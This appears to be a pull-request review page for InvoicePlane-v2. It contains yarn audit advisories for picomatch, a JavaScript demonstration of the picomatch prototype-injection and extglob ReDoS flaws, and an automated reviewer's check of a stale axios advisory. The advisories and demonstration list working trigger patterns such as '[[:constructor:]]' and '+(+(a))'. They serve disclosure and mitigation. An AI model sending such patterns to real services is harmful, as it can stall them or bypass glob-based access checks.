The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115549,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115549,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115552,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115552,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditSummary","data":{"vulnerabilities":{"info":0,"low":0,"moderate":3,"high":5,"critical":0},"dependencies":156,"devDependencies":0,"optionalDependencies":0,"totalDependencies":156}}
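The two picomatch advisories in the audit report above describe a prototype-inheritance lookup (GHSA-3v7f-55p6-f55p, CWE-1321) and an extglob ReDoS (GHSA-c2c7-rcm5-vvqj, CWE-1333). The block below is an added, stand-alone illustration of both mechanisms and of the workarounds the advisories list; it is not picomatch's code and not part of this PR. `POSIX_VULNERABLE`, `POSIX_HARDENED`, `expandPosixClasses`, `compileExtglobPlus`, `measureReject`, `classifyExtglob` and `isRiskyExtglob` are hypothetical names for a deliberately minimal model: the only things taken from the advisories are the null-prototype fix for the POSIX table, the regex shape `^(?:(?=.)(?:a|aa)+)$` quoted for `+(a|aa)`, and the rule "reject `+()`, `*()` and nested extglobs in untrusted patterns". The sample globs are constructed for the demonstration.

```javascript
'use strict';

// ---- 1. POSIX class lookup: inherited keys leak into the generated regex ----

// Plain object: it inherits Object.prototype, so table['constructor'] is the
// Object function and table['toString'] is Object.prototype.toString.
const POSIX_VULNERABLE = { alnum: 'a-zA-Z0-9', alpha: 'a-zA-Z', digit: '0-9' };

// Null prototype, the shape of the fix quoted in the advisory: only own keys
// resolve, so any inherited method name falls through to "unknown class".
const POSIX_HARDENED = { __proto__: null, alnum: 'a-zA-Z0-9', alpha: 'a-zA-Z', digit: '0-9' };

// Hypothetical, minimal expander: rewrites every [[:name:]] into a bracket
// class built from the table entry, the way a glob-to-regex compiler would.
function expandPosixClasses(table, glob) {
  return glob.replace(/\[\[:([A-Za-z]+):\]\]/g, (_, name) => {
    const src = table[name];            // the lookup the advisory describes
    if (src === undefined) throw new Error(`unknown POSIX class: ${name}`);
    return `[${src}]`;                  // a function here is stringified and injected
  });
}

// ---- 2. Extglob quantifiers: the quoted regex shape and a pattern gate ----

// Builds the regex the advisory quotes for +(a|aa): ^(?:(?=.)(?:a|aa)+)$
function compileExtglobPlus(alternatives) {
  return new RegExp(`^(?:(?=.)(?:${alternatives.join('|')})+)$`);
}

// Times one rejection of a non-matching input: n copies of 'a' then a 'b'.
// Overlapping alternatives (a vs aa) make the engine try every split of the
// a-run before it can fail, so the cost grows exponentially in n.
function measureReject(re, n) {
  const input = 'a'.repeat(n) + 'b';
  const t0 = process.hrtime.bigint();
  const matched = re.test(input);
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  return { matched, ms };
}

// Scans a glob for extglob openers ( @( ?( *( +( !( ), skipping escaped
// characters, and reports whether a quantifier form appears and how deeply
// extglob groups nest.
function classifyExtglob(pattern) {
  let depth = 0, maxDepth = 0, hasQuantifier = false;
  for (let i = 0; i < pattern.length; i++) {
    const c = pattern[i];
    if (c === '\\') { i++; continue; }
    if ('@?*+!'.includes(c) && pattern[i + 1] === '(') {
      if (c === '*' || c === '+') hasQuantifier = true;
      depth++;
      maxDepth = Math.max(maxDepth, depth);
      i++;
    } else if (c === ')' && depth > 0) {
      depth--;
    }
  }
  return { hasQuantifier, maxDepth };
}

// Gate for untrusted patterns, following the advisory's workaround list:
// refuse +() / *() and any nested extglob before the pattern reaches a matcher.
function isRiskyExtglob(pattern) {
  const { hasQuantifier, maxDepth } = classifyExtglob(pattern);
  return hasQuantifier || maxDepth > 1;
}

function demo() {
  console.log(expandPosixClasses(POSIX_VULNERABLE, '[[:alpha:]]'));        // [a-zA-Z]
  console.log(expandPosixClasses(POSIX_VULNERABLE, '[[:constructor:]]'));  // [function Object() { [native code] }]
  try { expandPosixClasses(POSIX_HARDENED, '[[:constructor:]]'); }
  catch (e) { console.log('hardened table:', e.message); }

  const re = compileExtglobPlus(['a', 'aa']);
  for (const n of [16, 20, 24, 28]) {
    const { matched, ms } = measureReject(re, n);
    console.log(`n=${n} matched=${matched} ${ms.toFixed(2)} ms`);
  }
  for (const p of ['+(a|aa)', '*(+(a))', '@(foo|bar).js', 'src/**/*.js']) {
    console.log(p, isRiskyExtglob(p) ? 'REJECT' : 'ok');
  }
}

if (typeof require === 'function' && require.main === module) demo();
```

Run it with `node` and watch the rejection time roughly double every two or three characters; the advisory's 41-character figure is the same curve extended. The gate is a pre-filter for untrusted input only: the real fix is the upgrade to 4.0.4 / 3.0.2 / 2.3.2, and for patterns that must stay extglob-free the advisory's own `noextglob: true` option is the supported switch. Matching in a worker with a time limit, also on the advisory's list, is the only way to bound a regex that has already been compiled.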

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '--- package manifest ---'
rg -n '"axios"\s*:\s*"\^1\.14\.0"' package.json

echo
echo '--- diff: audit-before.json vs audit-report.json ---'
diff -u audit-before.json audit-report.json || true

echo
echo '--- direct axios finding in audit-report.json ---'
rg -n '"path":"axios"|\"version\":\"1\.13\.2\"' audit-report.json

LOCKFILE="$(fd -HI '^yarn\.lock$' . | head -n1 || true)"
if [ -n "${LOCKFILE:-}" ]; then
  echo
  echo "--- axios resolutions in ${LOCKFILE} ---"
  rg -n -C1 'axios@|version "1\.13\.2"|version "1\.14\.0"' "$LOCKFILE"
fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 370


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '=== Checking for axios 1.13.2 in audit-report.json ==='
if grep -q '"version":"1.13.2"' audit-report.json; then
  echo '[FOUND] axios 1.13.2 is present in audit-report.json'
  grep -n '"version":"1.13.2"' audit-report.json | head -5
else
  echo '[NOT FOUND] axios 1.13.2 not in audit-report.json'
fi

echo
echo '=== Checking if audit files are identical ==='
if cmp -s audit-before.json audit-report.json; then
  echo '[IDENTICAL] audit-before.json and audit-report.json are byte-for-byte identical'
else
  echo '[DIFFERENT] Files differ'
  diff audit-before.json audit-report.json | head -20
fi

echo
echo '=== package.json axios version ==='
grep -o '"axios":\s*"[^"]*"' package.json

echo
echo '=== Checking lockfile for axios version ==='
if [ -f yarn.lock ]; then
  echo '[yarn.lock found]'
  grep -A2 'name: axios' yarn.lock | head -10
elif [ -f package-lock.json ]; then
  echo '[package-lock.json found]'
  grep -B2 -A2 '"axios"' package-lock.json | grep -A2 '"version"' | head -10
fi

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 4910


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '=== yarn.lock: axios entries ==='
grep -A3 '^"axios@' yarn.lock | head -20

echo
echo '=== Summary: What version of axios is locked? ==='
grep -A1 '"axios@\^1\.' yarn.lock | grep -E '^\s*version' | head -5

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 104


🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo '=== yarn.lock file info ==='
wc -l yarn.lock
head -30 yarn.lock

echo
echo '=== Search for axios in yarn.lock ==='
grep -i axios yarn.lock | head -20

Repository: InvoicePlane/InvoicePlane-v2

Length of output: 1635


Audit report shows axios 1.13.2 advisory despite yarn.lock locking 1.14.0.

The audit-report.json file contains a DoS advisory (CVE-2026-25639) for axios 1.13.2, but yarn.lock locks axios to version 1.14.0 (axios@^1.14.0). Version 1.14.0 is >= 1.13.5 (the patched version), so this advisory should not appear in a proper audit of the current dependency tree. Either the audit was not regenerated after the lockfile update, or the lockfile was not properly updated before the audit was run. Regenerate the audit report from the current lockfile to verify the dependency tree is consistent.

🧰 Tools
🪛 Biome (2.4.9)

[error] 2-2: End of file expected (parse)
[error] 3-3: End of file expected (parse)
[error] 4-4: End of file expected (parse)
[error] 5-5: End of file expected (parse)
[error] 6-6: End of file expected (parse)
[error] 7-7: End of file expected (parse)
[error] 8-8: End of file expected (parse)
[error] 9-9: End of file expected (parse)
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@audit-report.json` around lines 1 - 9, The audit-report.json contains a stale
advisory for axios (CVE-2026-25639 referencing version 1.13.2) even though
yarn.lock pins axios@^1.14.0; regenerate the audit from the current lockfile by
re-running the project audit command (e.g., npm/yarn audit or your audit
tooling) using the current yarn.lock, confirm axios resolves to >=1.13.5
(1.14.0) and that the CVE-2026-25639 entry is gone, then replace
audit-report.json with the regenerated report and commit the updated
audit-report.json and yarn.lock together to ensure consistency.

@nielsdrost7 nielsdrost7 deleted the automated/yarn-update-25 branch April 11, 2026 15:44